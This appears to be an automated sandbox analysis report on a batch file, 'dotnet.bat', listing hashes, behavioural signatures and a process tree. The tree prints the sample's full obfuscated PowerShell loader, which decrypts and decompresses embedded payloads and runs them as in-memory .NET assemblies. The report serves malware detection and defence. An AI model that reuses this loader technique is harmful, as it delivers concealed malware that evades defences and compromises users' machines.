Analysis
- max time kernel: 34s
- max time network: 19s
- platform: windows7_x64
- resource: win7-20240611-en
- resource tags: arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
- submitted: 27-06-2024 22:08
Static task: static1

Behavioral task: behavioral1
- Sample: dotnet.bat
- Resource: win7-20240611-en
- 4 signatures
- 150 seconds

Behavioral task: behavioral2
- Sample: dotnet.bat
- Resource: win10v2004-20240611-en
- 9 signatures
- 150 seconds
General
- Target: dotnet.bat
- Size: 62KB
- MD5: 3dfb1c3ff09dc31a4096b821b9ff204b
- SHA1: 8604c300175bf352b7612412c6521064a2514674
- SHA256: a6a1b599988d0dddc226b2c2a3780426d84fcccb29de54076f3171131b84560b
- SHA512: 895cfb222d6b20b9761188531a3ba45df6f7f799aaf760c14c2de4892947a124c35bcd66e20e98cf62bd4c635c46fc5f8ab6d8c7207a081d98b2b8b31a47e172
- SSDEEP: 1536:nOTyT0nIr49koWVZVCud2f7vXJiEOlVnpw0APKNjO4mdFqQjHQp+XuHdd:OmTGZ0aPIEapexSNjO4mdFqQjHQp+Xun

Score: 1/10
Malware Config
Signatures
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes (pid | process):
  1396 | powershell.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes (pid | process):
  1396 | powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 1396 | powershell.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes (description | pid | process | target process):
  PID 2196 wrote to memory of 1460 | 2196 | cmd.exe | cmd.exe
  PID 2196 wrote to memory of 1460 | 2196 | cmd.exe | cmd.exe
  PID 2196 wrote to memory of 1460 | 2196 | cmd.exe | cmd.exe
  PID 1460 wrote to memory of 1252 | 1460 | cmd.exe | cmd.exe
  PID 1460 wrote to memory of 1252 | 1460 | cmd.exe | cmd.exe
  PID 1460 wrote to memory of 1252 | 1460 | cmd.exe | cmd.exe
  PID 1460 wrote to memory of 1396 | 1460 | cmd.exe | powershell.exe
  PID 1460 wrote to memory of 1396 | 1460 | cmd.exe | powershell.exe
  PID 1460 wrote to memory of 1396 | 1460 | cmd.exe | powershell.exe
  PID 1460 wrote to memory of 1396 | 1460 | cmd.exe | powershell.exe
Processes (tree; depth shown by indentation)

1. C:\Windows\system32\cmd.exe
   Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\dotnet.bat"
   PID: 2196
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\system32\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\dotnet.bat
      PID: 1460
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\cmd.exe
         PID: 1252
         Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\dotnet.bat';$xDtS='ElYHdFemYHdFenYHdFtYHdFAtYHdF'.Replace('YHdF', ''),'CrXdFueXdFuateXdFuDXdFuecXdFuryXdFuptXdFuorXdFu'.Replace('XdFu', ''),'ReavBIQdLivBIQnevBIQsvBIQ'.Replace('vBIQ', ''),'ChclqwangclqweExclqwteclqwnsclqwioclqwnclqw'.Replace('clqw', ''),'SlbGapllbGailbGatlbGa'.Replace('lbGa', ''),'EntVvfqrVvfqyVvfqPoVvfqintVvfq'.Replace('Vvfq', ''),'GDUebetDUebCDUeburDUebreDUebntDUebPDUebrDUebocDUebeDUebssDUeb'.Replace('DUeb', ''),'InwCnHvwCnHokwCnHewCnH'.Replace('wCnH', ''),'MbzddabzddinbzddMbzddodbzddulbzddebzdd'.Replace('bzdd', ''),'CoHtCjpyHtCjTHtCjoHtCj'.Replace('HtCj', ''),'TrgsRuangsRusfogsRurgsRumFgsRuinagsRulgsRuBlgsRuogsRuckgsRu'.Replace('gsRu', ''),'FXaAdroXaAdmBaXaAdse6XaAd4SXaAdtriXaAdngXaAd'.Replace('XaAd', ''),'LJqGooJqGoadJqGo'.Replace('JqGo', ''),'DecvzAfomvzAfprevzAfssvzAf'.Replace('vzAf', '');powershell -w hidden;function Danvp($lTsfF){$IinaH=[System.Security.Cryptography.Aes]::Create();$IinaH.Mode=[System.Security.Cryptography.CipherMode]::CBC;$IinaH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$IinaH.Key=[System.Convert]::($xDtS[11])('l/8Zv/EpLMnbiOEmln+qmDuX6mbLpB+RJyTapDCMy7s=');$IinaH.IV=[System.Convert]::($xDtS[11])('b6sRnvv07xnoSRxLd16ndw==');$JyEuL=$IinaH.($xDtS[1])();$tzwAe=$JyEuL.($xDtS[10])($lTsfF,0,$lTsfF.Length);$JyEuL.Dispose();$IinaH.Dispose();$tzwAe;}function xhzzZ($lTsfF){$GBBAW=New-Object System.IO.MemoryStream(,$lTsfF);$YKZuR=New-Object System.IO.MemoryStream;$GGjTN=New-Object System.IO.Compression.GZipStream($GBBAW,[IO.Compression.CompressionMode]::($xDtS[13]));$GGjTN.($xDtS[9])($YKZuR);$GGjTN.Dispose();$GBBAW.Dispose();$YKZuR.Dispose();$YKZuR.ToArray();}$iUMdN=[System.IO.File]::($xDtS[2])([Console]::Title);$FbPOM=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 5).Substring(2))));$RVaAE=xhzzZ (Danvp ([Convert]::($xDtS[11])([System.Linq.Enumerable]::($xDtS[0])($iUMdN, 6).Substring(2))));[System.Reflection.Assembly]::($xDtS[12])([byte[]]$RVaAE).($xDtS[5]).($xDtS[7])($null,$null);[System.Reflection.Assembly]::($xDtS[12])([byte[]]$FbPOM).($xDtS[5]).($xDtS[7])($null,$null); "

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
         Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
         PID: 1396
         - Suspicious behavior: CmdExeWriteProcessMemorySpam
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken